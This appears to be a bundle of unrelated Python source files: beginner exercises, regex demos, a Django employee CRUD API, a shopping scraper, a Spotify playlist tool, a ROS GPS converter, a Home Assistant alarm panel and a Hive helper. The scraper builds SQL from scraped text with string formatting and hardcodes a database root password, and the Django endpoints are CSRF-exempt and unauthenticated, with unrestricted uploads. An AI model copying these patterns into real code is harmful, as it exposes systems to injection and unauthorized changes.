# def safe_float(obj):
# try:
# retval = float(obj)
# except ValueError:
# retval = "could not convert non-number to float"
# except TypeError:
# retval = "object type cannot be converted to float"
# return retval
#
# aaa = safe_float([111,222])
# print aaa
# import xlrd
# log = open('logfile.txt','w')
# try:
# xlrd.function()
# except:
# log.write("*** caught exception in module\n")
# else:
# log.write("*** no exceptions caught\n")
# log.close()
# from time import ctime,sleep
# def tsfunc(func):
# def wrappedFunc():
# print "[%s] %s() called" % (ctime(),func.__name__)
# return func()
# return wrappedFunc
# @tsfunc
# def foo():
# pass
# foo()
# sleep(4)
# for i in range(2):
# sleep(1)
# foo()
# def convert(func,seq):
# "conv.sequence of numbers to same type"
# return [func(eachNum) for eachNum in seq]
# myseq = (123,45.67,-6.2e8,9999999L)
# print convert(int,myseq)
# print convert(long,myseq)
# print convert(float,myseq)
# def \
# taxMe(cost,rate = 0.0825):
# return cost + (cost * rate)
# print taxMe(100)
# print taxMe(100,0.05)
# from urllib import urlretrieve
# def firstNonBlank(lines):
# for eachLine in lines:
# if not eachLine.strip():
# continue
# else:
# return eachLine
#
# def firstLast(webpage):
# f = open(webpage)
# lines = f.readlines()
# f.close()
# print firstNonBlank(lines)
# lines.reverse()
# print firstNonBlank(lines)
#
# def download(url = 'http://www.baidu.com',process = firstLast):
# try:
# retval = urlretrieve(url)[0]
# except IOError:
# retval = None
# if retval:
# process(retval)
# if __name__ == '__main__':
# download()
# #GUI小例
# from functools import partial
# import Tkinter
# root = Tkinter.Tk()
# MyButton = partial(Tkinter.Button,root,fg='white',bg='blue')
# b1 = MyButton(text='Button 1')
# b2 = MyButton(text='Button 2')
# qb = MyButton(text='Quit',bg='red',command=root.quit)
# b1.pack()
# b2.pack()
# qb.pack(fill=Tkinter.X,expand=True)
# root.title('PFAs!')
# root.mainloop()
# def countToFour1():
# for eachNum in range(5):
# print eachNum
#
# def countToFour2(n):
# for eachNum in range(n,5):
# print eachNum
#
# def countToFour3(n=1):
# for eachNum in range(n,5):
# print eachNum
#
# # countToFour1()
# countToFour2(5)
# countToFour3(5)
# a = map(None,[1,2,3],['abc','edf','bbb','ddd'])
# print a
# #调用sys.exit()退出
# import sys
# def usage():
# print 'At Least 2 arguments (inc1.cmd name).'
# print 'usage:args.py arg1 arg2 [arg3...]'
# sys.exit(1)
#
# argc = len(sys.argv)
# if argc<3:
# usage()
# print "number of args entered:",argc
# print "args (inc1.cmd name) were:".sys.argv
# import sys
# prev_exit_func = getattr(sys,'exitfunc',None)
# def my_exit_func(old_exit = prev_exit_func):
# #perform cleanup 进行清理
# if old_exit is not None and callable(old_exit):
# old_exit()
#
# sys.exitfunc = my_exit_func()
#单线程例子
# from time import sleep,ctime
#
# def loop0():
# print 'start loop0 at:',ctime()
# sleep(4)
# print 'loop0 done at:',ctime()
#
# def loop1():
# print 'start loop1 at:',ctime()
# sleep(2)
# print 'loop1 done at:',ctime()
#
# def main():
# print 'starting at:',ctime()
# loop0()
# loop1()
# print 'all DONE at :',ctime()
#
# if __name__ == '__main__':
# main()
# 多线程例子
# import thread
# from time import sleep,ctime
#
# def loop():
# print 'start loop0 at:',ctime()
# sleep(4)
# print 'loop0 done at:',ctime()
#
# def loop1():
# print 'start loop1 at:',ctime()
# sleep(2)
# print 'loop1 done at:',ctime()
#
# def main():
# print 'starting at:', ctime()
# thread.start_new_thread(loop(), ())
# thread.start_new_thread(loop1(), ())
# sleep(6)
# print 'all Done at:', ctime()
#
# if __name__ == '__main__':
# main()
# import thread
# from time import sleep,ctime
#
# loops = [4,2]
#
# def loop(nloop,nsec,lock):
# print 'start loop',nloop,'at:',ctime()
# sleep(nsec)
# print 'loop',nloop,'done at:',ctime()
# lock.release()
#
# def main():
# print 'starting at:',ctime()
# locks = []
# nloops = range(len(loops))
#
# for i in loops:
# lock = thread.allocate_lock()
# lock.acquire()
# locks.append(lock)
#
# for i in nloops:
# thread.start_new_thread(loop,(i,loops[i],locks[i]))
#
# for i in nloops:
# while locks[i].locked():
# pass
#
# print 'all DONE at:',ctime()
#
# if __name__ == '__main__':
# main()
# import Tkinter
# label = Tkinter.Label(top,text = 'Hello World !')
# label.pack()
#
# quit = Tkinter.Button(top,text = 'Quit',command = top.quit,bg = 'red',fg = 'blue')
# quit.pack(fill = Tkinter.X,expand = 1)
# from Tkinter import *
# def resize(ev = None):
# label.config(font = 'Helvetica -%d bold' % scale.get())
# top = Tk()
# top.geometry('250x250')
# label = Label(top,text = '孟庆秀',font = 'Helvetica -12 bold')
# label.pack(fill = Y,expand = 1)
#
# scale = Scale(top,from_ = 10,to = 40,orient = HORIZONTAL,command = resize)
# scale.set(12)
# scale.pack(fill = X,expand = 1)
#
# quit = Button(top,text = "Quit",command = top.quit,activeforeground = 'white',activebackground = 'red')
# quit.pack()
#
#
# mainloop()
# def sum_jc(n):
# sum_n = 0
# for i in range(n):
# jc = 1
# for j in range(i+1):
# jc = jc*(j+1)
# sum_n = sum_n + jc
# return sum_n
# if __name__ == '__main__':
# m = sum_jc(20)
# print m
# def get_num(a):
# list = []
# no = 0
# for i in a:
# for j in a:
# for m in a:
# sum = i*100 + j *10 + m
# list.append(sum)
# # print sum
# no = no + 1
# return list,no
# if __name__ == '__main__':
# list = [1,2,3,4]
# res,no = get_num(list)
# print no
# print res
# # for i in res:
# # print i
# def reward(profit):
# if profit*10000<=100000:
# res = profit*10000*0.1
# if 100000<profit*10000<200000:
# res = 100000*0.1 + (profit*10000-100000)*0.075
# if
# import math
# i = 1
# while True:
# i = i + 1
# if int(sqrt())
import re

secret_code = 'honohoihbpihbxxIxx112dsfowjfn2oxxlovexx9ohhdfwxxyouxxjph23h'
# Example of '.' (any single character):
# a = 'xy123'
# b = re.findall('x.', a)
# print(b)
# Example of '*' (zero or more repetitions):
# a = 'xxyx1x23'
# b = re.findall('x*', a)
# print(b)
# Example of '?' (zero or one repetition):
# a = 'xxyx12x3'
# b = re.findall('x?', a)
# print(b)
# Greedy vs non-greedy '.*' examples. print() function calls — the
# original Python 2 print statements are a SyntaxError under Python 3.
b = re.findall('xx.*xx', secret_code)
print(b)
c = re.findall('xx.*?xx', secret_code)
print(c)
d = re.findall('xx(.*?)xx', secret_code)
print(d)
|
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from rest_framework.parsers import JSONParser
from django.http.response import JsonResponse
from EmployeeApp.models import Departments, Employees
from EmployeeApp.serializers import DepartmentSerializer, EmployeeSerializer
from django.core.files.storage import default_storage
# Create your views here.
@csrf_exempt
def departmentApi(request, id = 0):
    """CRUD endpoint for Departments.

    GET    -> JSON list of all departments.
    POST   -> create a department from the JSON request body.
    PUT    -> update the department identified by DepartmentId in the body.
    DELETE -> delete the department with the given URL ``id``.
    """
    if request.method == 'GET':
        departments = Departments.objects.all()
        departments_serializer = DepartmentSerializer(departments, many=True)
        return JsonResponse(departments_serializer.data, safe=False)
    elif request.method == 'POST':
        department_data = JSONParser().parse(request)
        departments_serializer = DepartmentSerializer(data=department_data)
        if departments_serializer.is_valid():
            departments_serializer.save()
            # str() is required here: the original concatenated the serializer's
            # data (a dict-like) to a str, which raised TypeError at runtime.
            return JsonResponse("Added record successfully => " + str(departments_serializer.data), safe=False)
        return JsonResponse("Error adding record to database!", safe=False)
    elif request.method == 'PUT':
        department_data = JSONParser().parse(request)
        department = Departments.objects.get(DepartmentId=department_data['DepartmentId'])
        # Fixed NameError: the original passed the misspelled name 'deparment'.
        departments_serializer = DepartmentSerializer(department, data=department_data)
        if departments_serializer.is_valid():
            departments_serializer.save()
            return JsonResponse("Added record successfully!", safe=False)
        return JsonResponse("Error Editing record!", safe=False)
    elif request.method == 'DELETE':
        department = Departments.objects.get(DepartmentId=id)
        department.delete()
        return JsonResponse("Deleted record successfully!", safe=False)
# employees
@csrf_exempt
def employeeApi(request, id = 0):
    """CRUD endpoint for Employees (mirrors departmentApi).

    GET    -> JSON list of all employees.
    POST   -> create an employee from the JSON request body.
    PUT    -> update the employee identified in the body.
    DELETE -> delete the employee with the given URL ``id``.
    """
    if request.method == 'GET':
        employees = Employees.objects.all()
        employees_serializer = EmployeeSerializer(employees, many=True)
        return JsonResponse(employees_serializer.data, safe=False)
    elif request.method == 'POST':
        employee_data = JSONParser().parse(request)
        employees_serializer = EmployeeSerializer(data=employee_data)
        if employees_serializer.is_valid():
            employees_serializer.save()
            # str() is required: concatenating the serializer's data dict to a
            # str raised TypeError in the original.
            return JsonResponse("Added record successfully => " + str(employees_serializer.data), safe=False)
        return JsonResponse("Error adding record to database!", safe=False)
    elif request.method == 'PUT':
        employee_data = JSONParser().parse(request)
        # NOTE(review): body key 'employeeId' vs model field 'EmployeeId' --
        # confirm the client really sends the lowercase key.
        employee = Employees.objects.get(EmployeeId=employee_data['employeeId'])
        employees_serializer = EmployeeSerializer(employee, data=employee_data)
        if employees_serializer.is_valid():
            employees_serializer.save()
            return JsonResponse("Added record successfully!", safe=False)
        return JsonResponse("Error Editing record!", safe=False)
    elif request.method == 'DELETE':
        # Fixed NameError/AttributeError: the original used the undefined names
        # 'employees.objects' and 'Employee', and the wrong field 'employeeId'
        # (the model field is 'EmployeeId' per the PUT branch).
        employee = Employees.objects.get(EmployeeId=id)
        employee.delete()
        return JsonResponse("Deleted record successfully!", safe=False)
@csrf_exempt
def save_file(request):
    """Persist an uploaded file through Django's default storage.

    Expects the file under the 'file' key of the multipart body and returns
    the storage name it was saved under.
    """
    uploaded = request.FILES['file']
    stored_name = default_storage.save(uploaded.name, uploaded)
    return JsonResponse(stored_name, safe=False)
|
"""Amavis frontend default settings."""
DATABASE_ROUTERS = ["modoboa_amavis.dbrouter.AmavisRouter"]
SILENCED_SYSTEM_CHECKS = ["fields.W342", ]
|
import regex as re
from functools import reduce
PATTERN = re.compile(r'((\d)\2+)')
def read_data(file_name):
    """Return the full text of ../../resources/<file_name>.

    Uses a context manager so the handle is closed even if read() raises
    (the original leaked the handle on error).
    """
    with open('../../resources/' + file_name, 'r') as file_ref:
        return file_ref.read()
def run():
    """Solve part 1: sum every digit that equals the next digit (circularly).

    PATTERN groups runs of identical digits; a run of length k contributes
    digit * (k - 1). The wrap-around pair (last vs first char) is added
    separately.
    """
    data = read_data('day1.txt')
    # findall on ((\d)\2+) yields (full_run, digit) tuples.
    matches = PATTERN.findall(data)
    # sum() (unlike the original reduce) is safe when there are no runs at all.
    result = sum(int(run_text[0]) * (len(run_text) - 1) for run_text, _ in matches)
    # Circular comparison of the last digit against the first.
    if data and data[-1] == data[0]:
        result += int(data[0])
    return result
def run_2():
    """Solve part 2: sum digits that match the digit halfway around the circle.

    Matching is symmetric, so each pair is counted once over the first half
    and the total doubled. sum() (unlike the original reduce) handles the
    no-match case without raising.
    """
    data = read_data('day1.txt')
    half = len(data) // 2
    return 2 * sum(int(ch) for i, ch in enumerate(data[:half]) if ch == data[half + i])
if __name__ == '__main__':
    # Print the answers for both puzzle parts.
    print(run())
    print(run_2())
|
# Returns a match for any digit between 0 and 9
import re

txt = "8 times before 11:45 AM"

# Collect every individual digit character that appears in the text.
x = re.findall("[0-9]", txt)
print(x)

# Report whether the text contained at least one digit.
print("Yes, there is at least one match!" if x else "No match")
|
# -*- coding: utf-8 -*-
"""Scrape Yahoo! Shopping laptop listings for a user-chosen brand.

Prompts for a brand name, fetches the matching category page, and inserts
products not already recorded into the local MySQL `store` table.

NOTE(review): assumes a local MySQL server with database `lcc` and a
`store` table already exists -- confirm before running.
"""
import requests
from bs4 import BeautifulSoup
import pymysql

# Connection to the local MySQL instance used to persist scraped products.
conn = pymysql.connect(host='localhost',user='root',password='123456789',database='lcc',charset='utf8')
cursor = conn.cursor()
# Yahoo! Shopping notebook category page.
url = 'https://tw.buy.yahoo.com/category/4385994'
# Browser-like User-Agent so the request is not rejected as a bot.
header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'}
key = input('請輸入NB品牌:')  # prompt (Chinese): "Enter the laptop brand:"
# Brand filter query parameter ('品牌_' means 'brand_').
param = {'flt':'品牌_'+key}
content = requests.get(url,headers = header, params = param).text
soup = BeautifulSoup(content,'html.parser')
# Product tiles; these class names look auto-generated and may change --
# TODO confirm they still match the live page.
nb = soup.find_all('li',class_='BaseGridItem__grid___2wuJ7 BaseGridItem__multipleImage___37M7b')
#print(nb[0])
for row in nb:
    link = row.find('a').get('href')
    img = row.find('img').get('srcset')
    firstimg = img.split(',')
    # First srcset entry is "<url> <descriptor>", so nbimg[0] is the image URL.
    nbimg = firstimg[0].split()
    values = list(row.stripped_strings)# keep only the text fragments inside the tile
    price = values[1].replace('$','')# strip the '$' sign
    price = price.replace(',','')# strip thousands separators so the price is numeric and comparable
    if values[0] !='補貨中':# skip "restocking" (out-of-stock) tiles so the parsing doesn't break
        # NOTE(review): SQL built via str.format on scraped text -- a title
        # containing a quote breaks the statement (SQL injection risk);
        # parameterized queries would be safer.
        sql = "select * from store where webname='Yahoo' and title='{}'".format(values[0])
        cursor.execute(sql)
        if cursor.rowcount == 0:
            sql="insert into store (webname,title,price,link,photo_url) values('Yahoo','{}',{},'{}','{}')".format(values[0],price,link,nbimg[0])
            cursor.execute(sql)
            conn.commit()
            print('產品:',values[0])
            print('價格:',price)
            print('連結:',link)
            print('圖片:',nbimg[0])
            print()
cursor.close()
conn.close()
|
# Reverse a string in Python.
import sys

# Read one line from the user.
ip_string = input()
# "".join(reversed(...)) is equivalent to the slice ip_string[::-1].
op_string = "".join(reversed(ip_string))
print(op_string)
|
# NOTE(review): the legacy search.twitter.com JSON API used below has long
# been retired; the request structure is kept for reference but will not
# return live data.
import urllib.request
import json

# Ported from Python 2: urllib.urlopen -> urllib.request.urlopen, print
# statements -> print(), and json.load()'s removed `encoding` argument dropped.
response = urllib.request.urlopen(
    "http://search.twitter.com/search.json?q=microsoft"
)
pyresponse = json.load(response)
# type(pyresponse) = 'dict' This denotes it as a dictionary where
# results can be obtained using something like pyresponse.keys() which
# will give a list of the keys in the pyresponse dictionary
print("pyresponse is a " + str(type(pyresponse)))
print("the pyresponse keys are " + str(pyresponse.keys()))
print('')
# pyresults is a list of result dictionaries
pyresults = pyresponse["results"]
print(pyresults[0]['text'])
for i in range(10):
    print(pyresults[i]['text'])
|
import googleapiclient.discovery
import json
import youtube_dl
from secret import spotify_id, spotify_token, api_key
from urllib.parse import urlparse, parse_qs
import requests
class CreatePlaylist:
    """Copy the songs of a YouTube playlist into a new Spotify playlist."""

    def __init__(self):
        """Load API credentials and the source playlist URL."""
        self.user_id = spotify_id
        self.spotify_token = spotify_token
        self.api_key = api_key
        # Source YouTube playlist to copy from.
        self.url = "https://www.youtube.com/watch?v=dY0MYPogyDs&list=PLilMZ_AoO7FsA07dzE7M9N0LkUIGX8-eH"
        # title -> {url, song_name, artist, spotify_uri} for resolved songs.
        self.song_info = {}
        # title -> {url} for videos whose track metadata could not be resolved.
        self.cannot_find = {}

    # Gets the songs from youtube playlist
    def get_youtube_playlist(self):
        """Fetch every playlist video and resolve each to a Spotify URI."""
        # Get the id of the url link
        query = parse_qs(urlparse(self.url).query, keep_blank_values=True)
        playlist_id = query["list"][0]
        print(playlist_id)
        youtube = googleapiclient.discovery.build("youtube", "v3", developerKey=self.api_key)
        request = youtube.playlistItems().list(
            part="snippet",
            playlistId=playlist_id,
            maxResults=50
        )
        # Page through the playlist; list_next() returns None after the last
        # page. (The original executed the first request twice, wasting an
        # API call.)
        playlist_items = []
        while request is not None:
            response = request.execute()
            playlist_items += response["items"]
            request = youtube.playlistItems().list_next(request, response)
        for song in playlist_items:
            link = 'https://www.youtube.com/watch?v={}'.format(song["snippet"]["resourceId"]["videoId"])
            try:
                video = youtube_dl.YoutubeDL({}).extract_info(link, download=False)
                try:
                    name = video["track"]
                    artist = video["artist"]
                    self.song_info[song["snippet"]["title"]] = {
                        "url": link,
                        "song_name": name,
                        "artist": artist,
                        "spotify_uri": self.get_spotify_link(artist, name)
                    }
                except KeyError:
                    # Video metadata carries no track/artist fields.
                    self.cannot_find[song["snippet"]["title"]] = {
                        "url": link
                    }
            except Exception:
                # Narrowed from a bare `except:`, which also swallowed
                # SystemExit/KeyboardInterrupt.
                self.cannot_find[song["snippet"]["title"]] = {
                    "url": link
                }

    # Gets the spotify link for songs using title and artist
    def get_spotify_link(self, artist, song_name):
        """Return the Spotify URI of the first search hit for artist/song.

        NOTE(review): song_name/artist are not URL-encoded, and songs[0]
        raises IndexError when the search returns no tracks -- confirm inputs.
        """
        query = "https://api.spotify.com/v1/search?q=track:{}%20artist:{}&type=track&limit=10&offset=0".format(
            song_name,
            artist
        )
        response = requests.get(
            query,
            headers={
                "Content-Type": "application/json",
                "Authorization": "Bearer {}".format(self.spotify_token)
            }
        )
        response_json = response.json()
        songs = response_json["tracks"]["items"]
        # This will return the first track in the list of possible tracks
        return songs[0]["uri"]

    # Creates new spotify playlist
    def create_playlist(self):
        """Create an empty public playlist and return its Spotify id."""
        request_data = json.dumps({
            "name": "New Playlist",
            "description": "New playlist description",
            "public": True
        })
        query = "https://api.spotify.com/v1/users/{}/playlists".format(self.user_id)
        response = requests.post(
            query,
            data=request_data,
            headers={
                "Content-Type": "application/json",
                "Authorization": "Bearer {}".format(self.spotify_token)
            }
        )
        response_json = response.json()
        return response_json["id"]

    # Adds songs to playlist
    def add_songs(self):
        """Resolve the YouTube playlist and push all found songs to Spotify."""
        self.get_youtube_playlist()
        uris = [info["spotify_uri"] for info in self.song_info.values()]
        playlist_id = self.create_playlist()
        request_data = json.dumps(uris)
        query = "https://api.spotify.com/v1/playlists/{}/tracks".format(playlist_id)
        response = requests.post(
            query,
            data=request_data,
            headers={
                "Content-Type": "application/json",
                "Authorization": "Bearer {}".format(self.spotify_token)
            }
        )
        response_json = response.json()
        return response_json
|
#!/usr/bin/env python
import rospy
from std_msgs.msg import String
from sensor_msgs.msg import NavSatFix
import math
def _lla_to_ecef(lat_deg, lon_deg, alt):
    """Convert geodetic lat/lon (degrees) and altitude (metres) to ECEF, WGS-84."""
    # WGS-84 ellipsoid constants.
    a = 6378137
    b = 6356752.3142
    f = (a - b) / a        # flattening
    e_sq = f * (2 - f)     # first eccentricity squared
    lamb = math.radians(lat_deg)
    phi = math.radians(lon_deg)
    sin_lambda = math.sin(lamb)
    cos_lambda = math.cos(lamb)
    sin_phi = math.sin(phi)
    cos_phi = math.cos(phi)
    # Prime-vertical radius of curvature.
    N = a / math.sqrt(1 - e_sq * sin_lambda * sin_lambda)
    x = (alt + N) * cos_lambda * cos_phi
    y = (alt + N) * cos_lambda * sin_phi
    z = (alt + (1 - e_sq) * N) * sin_lambda
    return x, y, z

def callback(msg):
    """Log a NavSatFix in LLA, ECEF, and local ENU relative to a fixed origin.

    Changes vs. original: C-style semicolons removed, the unused deg_to_rad
    constant dropped, and the duplicated LLA->ECEF computation factored into
    _lla_to_ecef (formulas unchanged).
    """
    rospy.loginfo( "Input position: [%f,%f, %f]", msg.latitude, msg.longitude, msg.altitude)
    # Fixed ENU origin (degrees / metres).
    latitude_init = 45.6311926152
    longitude_init = 9.2947495255
    h0 = 231.506675163
    # LLA -> ECEF for the incoming fix.
    x, y, z = _lla_to_ecef(msg.latitude, msg.longitude, msg.altitude)
    rospy.loginfo( "ECEF position: [%f,%f, %f]", x, y, z)
    # ECEF of the fixed origin, plus its rotation angles for the ENU frame.
    x0, y0, z0 = _lla_to_ecef(latitude_init, longitude_init, h0)
    lamb = math.radians(latitude_init)
    phi = math.radians(longitude_init)
    sin_lambda = math.sin(lamb)
    cos_lambda = math.cos(lamb)
    sin_phi = math.sin(phi)
    cos_phi = math.cos(phi)
    xd = x - x0
    yd = y - y0
    zd = z - z0
    # Rotate the ECEF offset into the local East/North/Up frame.
    xEast = -sin_phi * xd + cos_phi * yd
    yNorth = -cos_phi * sin_lambda * xd - sin_lambda * sin_phi * yd + cos_lambda * zd
    zUp = cos_lambda * cos_phi * xd + cos_lambda * sin_phi * yd + sin_lambda * zd
    rospy.loginfo( "ENU position: [%f,%f, %f]", xEast, yNorth, zUp)
def lla2enu():
    """Start the lla2enu node and log ENU conversions for incoming GPS fixes."""
    rospy.init_node('lla2enu', anonymous=True)
    # Every NavSatFix published on this topic is converted and logged.
    rospy.Subscriber("/swiftnav/front/gps_pose", NavSatFix, callback)
    # Block until the node is shut down.
    rospy.spin()
if __name__ == '__main__':
    # Start the ROS node when run as a script.
    lla2enu()
|
"""Module for SIA Alarm Control Panels."""
import logging
from homeassistant.core import callback
from homeassistant.helpers.entity import generate_entity_id
from homeassistant.helpers.event import async_track_point_in_utc_time
from homeassistant.helpers.restore_state import RestoreEntity
from homeassistant.components.alarm_control_panel import AlarmControlPanel
from homeassistant.util.dt import utcnow
from . import (
ALARM_FORMAT,
CONF_PING_INTERVAL,
CONF_ZONE,
PING_INTERVAL_MARGIN,
STATE_ALARM_ARMED_AWAY,
STATE_ALARM_ARMED_CUSTOM_BYPASS,
STATE_ALARM_ARMED_NIGHT,
STATE_ALARM_DISARMED,
STATE_ALARM_TRIGGERED,
)
DOMAIN = "sia"
_LOGGER = logging.getLogger(__name__)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
    """Implementation of platform setup from HA.

    Registers every SIAAlarmControlPanel instance held by the SIA hubs.
    """
    devices = [
        device
        for hub in hass.data[DOMAIN].values()
        # NOTE(review): reaches into the hub's private _states dict -- confirm
        # the hub class offers no public accessor.
        for device in hub._states.values()
        if isinstance(device, SIAAlarmControlPanel)
    ]
    # Lazy %-formatting: the message is only built when debug logging is on
    # (the original concatenated strings unconditionally).
    _LOGGER.debug("SIAAlarmControlPanel: setup: devices: %s", devices)
    async_add_entities(devices)
class SIAAlarmControlPanel(AlarmControlPanel, RestoreEntity):
    """Class for SIA Alarm Control Panels."""

    def __init__(self, entity_id, name, device_class, zone, ping_interval, hass):
        """Create the panel and register its entity id.

        NOTE(review): device_class is accepted but never stored -- confirm
        whether callers expect it to be exposed.
        """
        # Lazy %-formatting: only build the message when debug is enabled.
        _LOGGER.debug(
            "SIAAlarmControlPanel: init: Initializing SIA Alarm Control Panel: %s",
            entity_id,
        )
        self._should_poll = False
        self._entity_id = generate_entity_id(
            entity_id_format=ALARM_FORMAT, name=entity_id, hass=hass
        )
        self._name = name
        self.hass = hass
        self._ping_interval = ping_interval
        self._attr = {CONF_PING_INTERVAL: self.ping_interval, CONF_ZONE: zone}
        self._is_available = True
        self._remove_unavailability_tracker = None
        self._state = STATE_ALARM_DISARMED

    async def async_added_to_hass(self):
        """Once the panel is added, see if it was there before and pull in that state."""
        await super().async_added_to_hass()
        state = await self.async_get_last_state()
        if state is not None and state.state is not None:
            _LOGGER.debug("SIAAlarmControlPanel: init: old state: %s", state.state)
            # Restore only states this panel can represent; anything else
            # becomes None (replaces the original five-way if/elif chain).
            restorable = (
                STATE_ALARM_ARMED_AWAY,
                STATE_ALARM_ARMED_NIGHT,
                STATE_ALARM_TRIGGERED,
                STATE_ALARM_DISARMED,
                STATE_ALARM_ARMED_CUSTOM_BYPASS,
            )
            self.state = state.state if state.state in restorable else None
        else:
            self.state = STATE_ALARM_DISARMED  # assume disarmed
        _LOGGER.debug("SIAAlarmControlPanel: added: state: %s", state)
        self._async_track_unavailable()

    @property
    def entity_id(self):
        """Get entity_id."""
        return self._entity_id

    @property
    def name(self):
        """Get Name."""
        return self._name

    @property
    def ping_interval(self):
        """Get ping_interval as a string (also stored in the attributes dict)."""
        return str(self._ping_interval)

    @property
    def state(self):
        """Get state."""
        return self._state

    @property
    def unique_id(self) -> str:
        """Get unique_id.

        NOTE(review): the display name doubles as the unique id, so renaming
        the panel changes its identity -- confirm this is intended.
        """
        return self._name

    @property
    def available(self):
        """Get availability."""
        return self._is_available

    def alarm_disarm(self, code=None):
        """Method for disarming, not implemented."""
        _LOGGER.debug("Not implemented.")

    def alarm_arm_home(self, code=None):
        """Method for arming, not implemented."""
        _LOGGER.debug("Not implemented.")

    def alarm_arm_away(self, code=None):
        """Method for arming, not implemented."""
        _LOGGER.debug("Not implemented.")

    def alarm_arm_night(self, code=None):
        """Method for arming, not implemented."""
        _LOGGER.debug("Not implemented.")

    def alarm_trigger(self, code=None):
        """Method for triggering, not implemented."""
        _LOGGER.debug("Not implemented.")

    def alarm_arm_custom_bypass(self, code=None):
        """Method for arming, not implemented."""
        _LOGGER.debug("Not implemented.")

    @property
    def device_state_attributes(self):
        """Return ping interval and zone as extra state attributes."""
        return self._attr

    @state.setter
    def state(self, state):
        """Set the state and schedule an HA state update."""
        self._state = state
        self.async_schedule_update_ha_state()

    def assume_available(self):
        """Reset the unavailability tracker (called when a ping arrives)."""
        self._async_track_unavailable()

    @callback
    def _async_track_unavailable(self):
        """(Re)arm the timer that marks the panel unavailable after a missed ping.

        Returns True when the panel transitioned from unavailable to available.
        """
        if self._remove_unavailability_tracker:
            self._remove_unavailability_tracker()
        self._remove_unavailability_tracker = async_track_point_in_utc_time(
            self.hass,
            self._async_set_unavailable,
            utcnow() + self._ping_interval + PING_INTERVAL_MARGIN,
        )
        if not self._is_available:
            self._is_available = True
            return True
        return False

    @callback
    def _async_set_unavailable(self, now):
        """Mark the panel unavailable once the ping deadline has passed."""
        self._remove_unavailability_tracker = None
        self._is_available = False
        self.async_schedule_update_ha_state()
|
from dataclasses import dataclass
import logging
import jaydebeapi
from tabulate import tabulate
HIVE_DRIVER_CLASSPATH = "org.apache.hive.jdbc.HiveDriver"
DEFAULT_LOGGING_FORMAT = '%(asctime)s :: %(levelname)s :: %(module)s :: %(message)s'
@dataclass
class QueryResult:
    """Tabular result of a query: ordered column names plus row values."""

    # Ordered column headers.
    columns: list
    # Row values, one list per row.
    rows: list

    def __table__(self):
        """Render the result as an org-mode table string."""
        return tabulate(self.rows, headers=self.columns, tablefmt='orgtbl')

    def __flat__(self):
        """Join the first cell of every row with newlines."""
        first_cells = (row[0] for row in self.rows)
        return '\n'.join(first_cells)
def build_results(raw_columns, raw_rows):
    """Normalize raw cursor output into a QueryResult.

    raw_columns: sequence of cursor-description tuples (name first).
    raw_rows: sequence of row tuples.
    """
    columns = [str(col[0]) for col in raw_columns]
    # The comprehension both copies and list-ifies each row; an empty input
    # simply yields [] (the original's len() > 0 guard was redundant).
    rows = [list(row) for row in raw_rows]
    return QueryResult(columns=columns, rows=rows)
@dataclass
class HiveHelperOptions:
    """Connection settings consumed by HiveHelper."""
    # HiveServer2 host name or IP.
    host: str
    # HiveServer2 port (kept as a string; interpolated into the JDBC URL).
    port: str
    # JDBC login user.
    user: str
    # JDBC login password.
    password: str
    # Path to the Hive JDBC driver jar handed to jaydebeapi.
    hive_jar: str
    # Segment appended after ';' in the JDBC URL -- presumably session/auth
    # parameters rather than a schema name; TODO confirm against callers.
    schema: str
class HiveHelper:
    """Thin helper around a single jaydebeapi (HiveServer2 JDBC) connection."""

    def __init__(self, database: str, opts: HiveHelperOptions = None, logger=None):
        """Store connection settings; nothing is opened until connect().

        NOTE(review): opts defaults to None but is dereferenced immediately --
        callers must always pass a HiveHelperOptions instance.
        """
        self._host = opts.host
        self._port = opts.port
        self._user = opts.user
        self._password = opts.password
        self._hive_jar = opts.hive_jar
        self._database = database
        self._schema = opts.schema
        self._conn: jaydebeapi.Connection = None
        self._curs: jaydebeapi.Cursor = None
        self._active = False
        if not logger:
            logging.basicConfig(level=logging.INFO, format=DEFAULT_LOGGING_FORMAT)
            self.logger = logging.getLogger()
        else:
            self.logger = logger

    def _build_connection(self):
        """Return the kwargs dict for jaydebeapi.connect()."""
        return {
            'jclassname': HIVE_DRIVER_CLASSPATH,
            'url': self._build_url(),
            'driver_args': {'user': self._user, 'password': self._password},
            'jars': self._hive_jar,
        }

    def _build_url(self):
        """Build the hive2 JDBC URL for the current database and schema options."""
        return f"jdbc:hive2://{self._host}:{self._port}/{self._database};{self._schema}"

    def set_database(self, database):
        """Switch databases, reconnecting if a connection is currently open."""
        old_database = self._database
        self._database = database
        if self._active:
            self.disconnect()
            self.connect()
        self.logger.info(f"Changed active database from [{old_database}] to"
                         f" [{self._database}]")

    def disconnect(self):
        """Close cursor and connection; a no-op when not connected."""
        if not self._active:
            return
        if self._curs:
            self._curs.close()
        if self._conn:
            self._conn.close()
        self._active = False
        self.logger.info(f"Disconnected from database [{self._database}]")

    def connect(self):
        """Open the JDBC connection and create a cursor."""
        self._conn = jaydebeapi.connect(**self._build_connection())
        self._curs = self._conn.cursor()
        self._active = True
        self.logger.info(f"Connected to database [{self._database}]")

    def run_query(self, sql):
        """Execute sql and return its result set as a QueryResult.

        Raises OperationalError when no connection is active -- consistent with
        get_partitions/get_tables (previously this failed with AttributeError
        on the None cursor).
        """
        if not self._active:
            raise jaydebeapi.OperationalError("HiveHelper has no active connection(s)")
        self._curs.execute(sql)
        raw_results = self._curs.fetchall()
        return build_results(self._curs.description, raw_results)

    def run_statement(self, sql):
        """Execute a DML/DDL statement and report the affected row count."""
        if not self._active:
            raise jaydebeapi.OperationalError("HiveHelper has no active connection(s)")
        self._curs.execute(sql)
        return f"{self._curs.rowcount} rows affected"

    def get_partitions(self, table_name):
        """Return the partition column names of table_name ([] when unpartitioned)."""
        partition_names = []
        if not self._active:
            raise jaydebeapi.OperationalError("HiveHelper has no active connection(s)")
        partitions_results = self.run_query(f"show partitions {table_name}")
        raw_partitions = [x[0] for x in partitions_results.rows]
        if not raw_partitions:
            return []
        # One partition spec looks like "col1=val1/col2=val2"; only the names
        # are needed. maxsplit=1 tolerates '=' inside values (the value itself
        # was never used by the original either).
        parts = raw_partitions[0].split("/")
        for part in parts:
            partition_names.append(part.split("=", 1)[0])
        return partition_names

    def get_tables(self, filter=None):
        """List table names, optionally keeping only names containing `filter`.

        NOTE: the parameter shadows the builtin filter(); the name is kept for
